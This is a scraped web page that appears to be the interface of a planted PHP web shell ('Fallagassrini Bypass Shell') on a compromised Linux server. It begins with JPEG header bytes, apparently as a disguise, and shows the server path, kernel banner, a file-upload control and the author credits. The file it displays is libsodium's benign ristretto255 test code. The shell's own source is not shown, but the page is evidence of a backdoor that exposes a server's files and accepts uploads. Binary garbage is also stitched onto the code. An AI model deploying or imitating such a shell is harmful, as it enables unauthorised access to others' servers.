JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /usr/share/doc/libsodium-devel-1.0.18/

Linux server.meentosys.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Upload File :
Current File : //usr/share/doc/libsodium-devel-1.0.18/core_ristretto255.c

#define TEST_NAME "core_ristretto255"
#include "cmptest.h"

static void
tv1(void)
{
    static const char *bad_encodings_hex[] = {
        /* Non-canonical field encodings */
        "00ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
        "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff7f",
        "f3ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff7f",
        "edffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff7f",

        /* Negative field elements */
        "0100000000000000000000000000000000000000000000000000000000000000",
        "01ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff7f",
        "ed57ffd8c914fb201471d1c3d245ce3c746fcbe63a3679d51b6a516ebebe0e20",
        "c34c4e1826e5d403b78e246e88aa051c36ccf0aafebffe137d148a2bf9104562",
        "c940e5a4404157cfb1628b108db051a8d439e1a421394ec4ebccb9ec92a8ac78",
        "47cfc5497c53dc8e61c91d17fd626ffb1c49e2bca94eed052281b510b1117a24",
        "f1c6165d33367351b0da8f6e4511010c68174a03b6581212c71c0e1d026c3c72",
        "87260f7a2f12495118360f02c26a470f450dadf34a413d21042b43b9d93e1309",

        /* Non-square x^2 */
        "26948d35ca62e643e26a83177332e6b6afeb9d08e4268b650f1f5bbd8d81d371",
        "4eac077a713c57b4f4397629a4145982c661f48044dd3f96427d40b147d9742f",
        "de6a7b00deadc788eb6b6c8d20c0ae96c2f2019078fa604fee5b87d6e989ad7b",
        "bcab477be20861e01e4a0e295284146a510150d9817763caf1a6f4b422d67042",
        "2a292df7e32cababbd9de088d1d1abec9fc0440f637ed2fba145094dc14bea08",
        "f4a9e534fc0d216c44b218fa0c42d99635a0127ee2e53c712f70609649fdff22",
        "8268436f8c4126196cf64b3c7ddbda90746a378625f9813dd9b8457077256731",
        "2810e5cbc2cc4d4eece54f61c6f69758e289aa7ab440b3cbeaa21995c2f4232b",

        /* Negative xy value */
        "3eb858e78f5a7254d8c9731174a94f76755fd3941c0ac93735c07ba14579630e",
        "a45fdc55c76448c049a1ab33f17023edfb2be3581e9c7aade8a6125215e04220",
        "d483fe813c6ba647ebbfd3ec41adca1c6130c2beeee9d9bf065c8d151c5f396e",
        "8a2e1d30050198c65a54483123960ccc38aef6848e1ec8f5f780e8523769ba32",
        "32888462f8b486c68ad7dd9610be5192bbeaf3b443951ac1a8118419d9fa097b",
        "227142501b9d4355ccba290404bde41575b037693cef1f438c47f8fbf35d1165",
        "5c37cc491da847cfeb9281d407efc41e15144c876e0170b499a96a22ed31e01e",
        "445425117cb8c90edcbc7c1cc0e74f747f2c1efa5630a967c64f287792a48a4b",

        /* s = -1, which causes y = 0 */
        "ecffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff7f"
    };
    unsigned char *s;
    size_t         i;

    s = (unsigned char *) sodium_malloc(crypto_core_ristretto255_BYTES);
    for (i = 0; i < sizeof bad_encodings_hex / sizeof bad_encodings_hex[0]; i++) {
        sodium_hex2bin(s, crypto_core_ristretto255_BYTES, bad_encodings_hex[i],
                       crypto_core_ristretto255_BYTES * 2 + 1,
                       NULL, NULL, NULL);
        if (crypto_core_ristretto255_is_valid_point(s)) {
            printf("[%s] was not rejected\n", bad_encodings_hex[i]);
        }
    }
    sodium_free(s);
};

static void
tv2(void)
{
    static const char *hash_hex[] = {
        "5d1be09e3d0c82fc538112490e35701979d99e06ca3e2b5b54bffe8b4dc772c1"
        "4d98b696a1bbfb5ca32c436cc61c16563790306c79eaca7705668b47dffe5bb6",

        "f116b34b8f17ceb56e8732a60d913dd10cce47a6d53bee9204be8b44f6678b27"
        "0102a56902e2488c46120e9276cfe54638286b9e4b3cdb470b542d46c2068d38",

        "8422e1bbdaab52938b81fd602effb6f89110e1e57208ad12d9ad767e2e25510c"
        "27140775f9337088b982d83d7fcf0b2fa1edffe51952cbe7365e95c86eaf325c",

        "ac22415129b61427bf464e17baee8db65940c233b98afce8d17c57beeb7876c2"
        "150d15af1cb1fb824bbd14955f2b57d08d388aab431a391cfc33d5bafb5dbbaf",

        "165d697a1ef3d5cf3c38565beefcf88c0f282b8e7dbd28544c483432f1cec767"
        "5debea8ebb4e5fe7d6f6e5db15f15587ac4d4d4a1de7191e0c1ca6664abcc413",

        "a836e6c9a9ca9f1e8d486273ad56a78c70cf18f0ce10abb1c7172ddd605d7fd2"
        "979854f47ae1ccf204a33102095b4200e5befc0465accc263175485f0e17ea5c",

        "2cdc11eaeb95daf01189417cdddbf95952993aa9cb9c640eb5058d09702c7462"
        "2c9965a697a3b345ec24ee56335b556e677b30e6f90ac77d781064f866a3c982"
    };
    unsigned char *s;
    unsigned char *u;
    char          *hex;
    size_t         i;

    s = (unsigned char *) sodium_malloc(crypto_core_ristretto255_BYTES);
    u = (unsigned char *) sodium_malloc(crypto_core_ristretto255_HASHBYTES);
    hex = (char *) sodium_malloc(crypto_core_ristretto255_BYTES * 2 + 1);
    for (i = 0; i < sizeof hash_hex / sizeof hash_hex[0]; i++) {
        sodium_hex2bin(u, crypto_core_ristretto255_HASHBYTES, hash_hex[i],
                       crypto_core_ristretto255_HASHBYTES * 2 + 1,
                       NULL, NULL, NULL);
        crypto_core_ristretto255_from_hash(s, u);
        sodium_bin2hex(hex, crypto_core_ristretto255_BYTES * 2 + 1,
                       s, crypto_core_ristretto255_BYTES);
        printf("%s\n", hex);
    }
    sodium_free(hex);
    sodium_free(u);
    sodium_free(s);
}

static void
tv3(void)
{
    static const unsigned char l[crypto_core_ed25519_BYTES] =
      { 0xed, 0xd3, 0xf5, 0x5c, 0x1a, 0x63, 0x12, 0x58,
        0xd6, 0x9c, 0xf7, 0xa2, 0xde, 0xf9, 0xde, 0x14,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10 };

    unsigned char *r =
        (unsigned char *) sodium_malloc(crypto_core_ristretto255_SCALARBYTES);
    unsigned char *r_inv =
        (unsigned char *) sodium_malloc(crypto_core_ristretto255_SCALARBYTES);
    unsigned char *ru =
        (unsigned char *) sodium_malloc(crypto_core_ristretto255_HASHBYTES);
    unsigned char *s =
        (unsigned char *) sodium_malloc(crypto_core_ristretto255_BYTES);
    unsigned char *s_ =
        (unsigned char *) sodium_malloc(crypto_core_ristretto255_BYTES);
    unsigned char *s2 =
        (unsigned char *) sodium_malloc(crypto_core_ristretto255_BYTES);
    int            i;

    for (i = 0; i < 1000; i++) {
        crypto_core_ristretto255_scalar_random(r);
        if (crypto_scalarmult_ristretto255_base(s, r) != 0 ||
            crypto_core_ristretto255_is_valid_point(s) != 1) {
            printf("crypto_scalarmult_ristretto255_base() failed\n");
        }
        crypto_core_ristretto255_random(s);
        if (crypto_core_ristretto255_is_valid_point(s) != 1) {
            printf("crypto_core_ristretto255_random() failed\n");
        }
        if (crypto_scalarmult_ristretto255(s, l, s) == 0) {
            printf("s*l != inf (1)\n");
        }
        randombytes_buf(ru, crypto_core_ristretto255_HASHBYTES);
        if (crypto_core_ristretto255_from_hash(s, ru) != 0 ||
            crypto_core_ristretto255_is_valid_point(s) != 1) {
            printf("crypto_core_ristretto255_from_hash() failed\n");
        }
        if (crypto_scalarmult_ristretto255(s2, l, s) == 0) {
            printf("s*l != inf (2)\n");
        }
        if (crypto_scalarmult_ristretto255(s2, r, s) != 0  ||
            crypto_core_ristretto255_is_valid_point(s2) != 1) {
            printf("crypto_scalarmult_ristretto255() failed\n");
        }
        if (crypto_core_ristretto255_scalar_invert(r_inv, r) != 0) {
            printf("crypto_core_ristretto255_scalar_invert() failed\n");
        }
        if (crypto_scalarmult_ristretto255(s_, r_inv, s2) != 0  ||
            crypto_core_ristretto255_is_valid_point(s_) != 1) {
            printf("crypto_scalarmult_ristretto255() failed\n");
        }
        if (memcmp(s, s_, crypto_core_ristretto255_BYTES) != 0) {
            printf("inversion failed\n");
        }
        if (crypto_scalarmult_ristretto255(s2, l, s2) == 0) {
            printf("s*l != inf (3)\n");
        }
        if (crypto_core_ristretto255_add(s2, s, s_) != 0) {
            printf("addition failed");
        }
        if (crypto_core_ristretto255_sub(s2, s2, s_) != 0) {
            printf("substraction failed");
        }
        if (crypto_core_ristretto255_is_valid_point(s2) == 0) {
            printf("invalid point");
        }
        if (memcmp(s, s2, crypto_core_ristretto255_BYTES) != 0) {
            printf("s2 + s - s_ != s\n");
        }
        if (crypto_core_ristretto255_sub(s2, s2, s) != 0) {
            printf("substraction failed");
        }
        if (crypto_core_ristretto255_is_valid_point(s2) == -1) {
            printf("s + s' - s - s' != 0");
        }
    }

    crypto_core_ristretto255_random(s);
    memset(s_, 0xfe, crypto_core_ristretto255_BYTES);
    assert(crypto_core_ristretto255_add(s2, s_, s) == -1);
    assert(crypto_core_ristretto255_add(s2, s, s_) == -1);
    assert(crypto_core_ristretto255_add(s2, s_, s_) == -1);
    assert(crypto_core_ristretto255_add(s2, s, s) == 0);
    assert(crypto_core_ristretto255_sub(s2, s_, s) == -1);
    assert(crypto_core_ristretto255_sub(s2, s, s_) == -1);
    assert(crypto_core_ristretto255_sub(s2, s_, s_) == -1);
    assert(crypto_core_ristretto255_sub(s2, s, s) == 0);

    sodium_free(s2);
    sodium_free(s_);
    sodium_free(s);
    sodium_free(ru);
    sodium_free(r_inv);
    sodium_free(r);
}

static void
tv4(void)
{
    unsigned char *r;
    unsigned char *s1;
    unsigned char *s2;
    unsigned char *s3;
    unsigned char *s4;

    r = (unsigned char *) sodium_malloc(crypto_core_ristretto255_NONREDUCEDSCALARBYTES);
    s1 = (unsigned char *) sodium_malloc(crypto_core_ristretto255_SCALARBYTES);
    s2 = (unsigned char *) sodium_malloc(crypto_core_ristretto255_SCALARBYTES);
    s3 = (unsigned char *) sodium_malloc(crypto_core_ristretto255_SCALARBYTES);
    s4 = (unsigned char *) sodium_malloc(crypto_core_ristretto255_SCALARBYTES);

    crypto_core_ristretto255_scalar_random(s1);
    randombytes_buf(r, crypto_core_ristretto255_NONREDUCEDSCALARBYTES);
    crypto_core_ristretto255_scalar_reduce(s2, r);
    memcpy(s4, s1, crypto_core_ristretto255_SCALARBYTES);
    crypto_core_ristretto255_scalar_add(s3, s1, s2);
    crypto_core_ristretto255_scalar_sub(s4, s1, s2);
    crypto_core_ristretto255_scalar_add(s2, s3, s4);
    crypto_core_ristretto255_scalar_sub(s2, s2, s1);
    crypto_core_ristretto255_scalar_mul(s2, s3, s2);
    crypto_core_ristretto255_scalar_invert(s4, s3);
    crypto_core_ristretto255_scalar_mul(s2, s2, s4);
    crypto_core_ristretto255_scalar_negate(s1, s1);
    crypto_core_ristretto255_scalar_add(s2, s2, s1);
    crypto_core_ristretto255_scalar_complement(s1, s2);
    s1[0]--;
    assert(sodium_is_zero(s1, crypto_core_ristretto255_SCALARBYTES));

    sodium_free(s1);
    sodium_free(s2);
    sodium_free(s3);
    sodium_free(s4);
    sodium_free(r);
}

int
main(void)
{
    tv1();
    tv2();
    tv3();
    tv4();

    assert(crypto_core_ristretto255_BYTES == crypto_core_ristretto255_bytes());
    assert(crypto_core_ristretto255_SCALARBYTES == crypto_core_ristretto255_scalarbytes());
    assert(crypto_core_ristretto255_NONREDUCEDSCALARBYTES == crypto_core_ristretto255_nonreducedscalarbytes());
    assert(crypto_core_ristretto255_NONREDUCEDSCALARBYTES >= crypto_core_ristretto255_SCALARBYTES);
    assert(crypto_core_ristretto255_HASHBYTES == crypto_core_ristretto255_hashbytes());
    assert(crypto_core_ristretto255_HASHBYTES >= crypto_core_ristretto255_BYTES);
    assert(crypto_core_ristretto255_BYTES == crypto_core_ed25519_BYTES);
    assert(crypto_core_ristretto255_SCALARBYTES == crypto_core_ed25519_SCALARBYTES);
    assert(crypto_core_ristretto255_NONREDUCEDSCALARBYTES == crypto_core_ed25519_NONREDUCEDSCALARBYTES);
    assert(crypto_core_ristretto255_HASHBYTES >= 2 * crypto_core_ed25519_UNIFORMBYTES);

    printf("OK\n");

    return 0;
}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net